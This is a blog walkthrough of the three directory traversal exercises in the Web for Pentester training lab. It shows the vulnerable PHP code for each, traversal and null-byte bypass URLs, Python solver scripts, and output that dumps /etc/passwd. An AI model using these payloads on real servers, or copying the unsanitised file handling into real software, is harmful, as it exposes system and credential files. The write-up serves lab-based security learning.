Web for Pentester Directory Traversal

1
179
Web for Pentester Directory Traversal

Hello friends how are you doing so in this post i will be covering the Web For Pentester Directory Traversal examples. And we will go through the source code of each example and explain the vulnerabilities to you and how to exploit them. Here are other sections File Include Attacks , MySql Injection

A shout out for all those who try and want to do by them self ! Don’t read on if you don’t want to the answers :p

Directory Traversal :-

The directory traversal attack is an information disclosure type of attack in which the attacker tries to gain control of the web application just by using user controlled parameters such that they can access files out side of the websites root on the server e.g. source code , configuration files, logs, and other OS system files.

Example 1 :-

The first example is really straight forward and simple. One of the basic exploit the code below explains its self a parameter named file on line No 11 which has no input sanitisation. This mean that an attacker can read system files just by sending some ../../../‘s to escape the web root and a path and find the file he wants.

Directory Traversal – Example 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php

$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
    die();


$file = $_GET['file'];

$path = $UploadDir . $file;

if (!is_file($path))
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

$handle = fopen($path, 'rb');

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();


?>

So by just making this request he can get the details.

http://[yourlab]/dirtrav/example1.php?file=../../../../../../etc/passwd

and also here is a Python Code which can also be used to get the same results this code have been written by  Aaron Fenwick .

Directory Traversal – Example 1 Solver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python

import requests
import sys

if len(sys.argv) != 2:
    print "Usage: " + sys.argv[0] + " <ip> or <hostname>"
    sys.exit(0)

payload = "/dirtrav/example1.php?file=../../../../../../etc/passwd"
exploit = requests.get("http://" + sys.argv[1] + payload)

print "[!] Sending payload: " + payload
print "[+] Status Code: " + str(exploit.status_code)
print "[+] Headers.."
for item, value in exploit.headers.items():
    print item, value
print "[+] End of Headers.."
print "[+] Start of body.."
print exploit.text
print "[+] End of body.."

And here is the result which you will see.

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
./dirtrav1.py 192.168.10.65
[!] Sending payload: /dirtrav/example1.php?file=../../../../../../etc/passwd
[+] Status Code: 200
[+] Headers..
content-length 475
content-disposition inline; filename="passwd";
content-encoding gzip
content-transfer-encoding binary
x-powered-by PHP/5.3.3-7+squeeze15
vary Accept-Encoding
keep-alive timeout=15, max=100
server Apache/2.2.16 (Debian)
connection Keep-Alive
cache-control public
date Sun, 13 Sep 2015 03:37:25 GMT
content-type text/html
[+] End of Headers..
[+] Start of body..
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
openldap:x:103:106:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash

[+] End of body..

 

Now a days if we look in to this vulnerability it is very rare that you will find this in modern web applications but understanding the level lets us build the base concepts the foundation and learn the advance concepts based on them.

Example 2 :-

So lets see what is wrong with this example and how to exploit it. If we look at the source code of this example we see that the developer have put a basic control that specifies the path of the files directory must be in the file parameters value, which is supplied by the user. Unfortunately, other than this basic check all other input from the user is left in tact. And the attacker can exploit is using this behavior.

Directory Traversal – Example 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php


if (!(isset($_GET['file'])))
    die();


$file = $_GET['file'];

if (!(strstr($file,"/var/www/files/")))
    die();

if (!is_file($file))
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));

$handle = fopen($file, 'rb');

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();


?>

 

So in order to bypass this filter our payload must pass the check placed by the developer on line 10 the and if you go for the previous method it will not work so here is how to exploit it.

http://[yourlab]/dirtrav/example1.php?file=/var/www/files/../../../../../../etc/passwd

here is the Python Code.

Directory Traversal – Example 2 Solver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/usr/bin/env python

import requests
import sys

if len(sys.argv) != 2:
    print "Usage: " + sys.argv[0] + "<ip> or <hostname>"
    sys.exit(0)

payload = "/dirtrav/example1.php?file=/var/www/files/../../../../../../etc/passwd"
exploit = requests.get("http://" + sys.argv[1] + payload)

print "[+] Status Code: " + str(exploit.status_code)
print "[+] Headers.."
for item, value in exploit.headers.items():
    print item, value
print "[+] End of Headers.."
print "[+] Start of body.."
print exploit.text
print "[+] End of body.."

 

And you will get the same result as in the previous example.

Example 3 :-

So finally the last example of this section 😀 lets see the things are now getting more like in the real world situation, so let see now the developer has hard coded the file so that we can only view png’s .png essentially and it escapes all other file types. But here the developer have a real bad luck :3 because on many operating systems, a bypass for this type of control by just appending a null-byte %00 at the end of your payload and that helps in terminating the file name and bypass the enforced .png on line 10.

Directory Traversal – Example 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
    die();


$file = $_GET['file'];

$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace('/\x00.*/',"",$path);

if (!is_file($path))
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

$handle = fopen($path, 'rb');

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();

?>

 

So here is how to do it the exploit.

http://[yourlab]/dirtrav/example1.php?file=../../../../../../etc/passwd%00

and i hope you know now how to change the python code so get the results.

Example 3 Solver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python

import requests
import sys

if len(sys.argv) != 2:
    print "Usage: " + sys.argv[0] + " <ip> or <hostname>"
    sys.exit(0)

payload = "/dirtrav/example3.php?file=../../../../../../etc/passwd%00"
exploit = requests.get("http://" + sys.argv[1] + payload)

print "[!] Sending payload: " + payload
print "[+] Status Code: " + str(exploit.status_code)
print "[+] Headers.."
for item, value in exploit.headers.items():
    print item, value
print "[+] End of Headers.."
print "[+] Start of body.."
print exploit.text
print "[+] End of body.."

 

and it is a all round success 😀 no questions asked from the null-byte 😀

So this is the end of this i really enjoy this series and will try my best to get to the other section as fast as i can so stay tuned 🙂

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here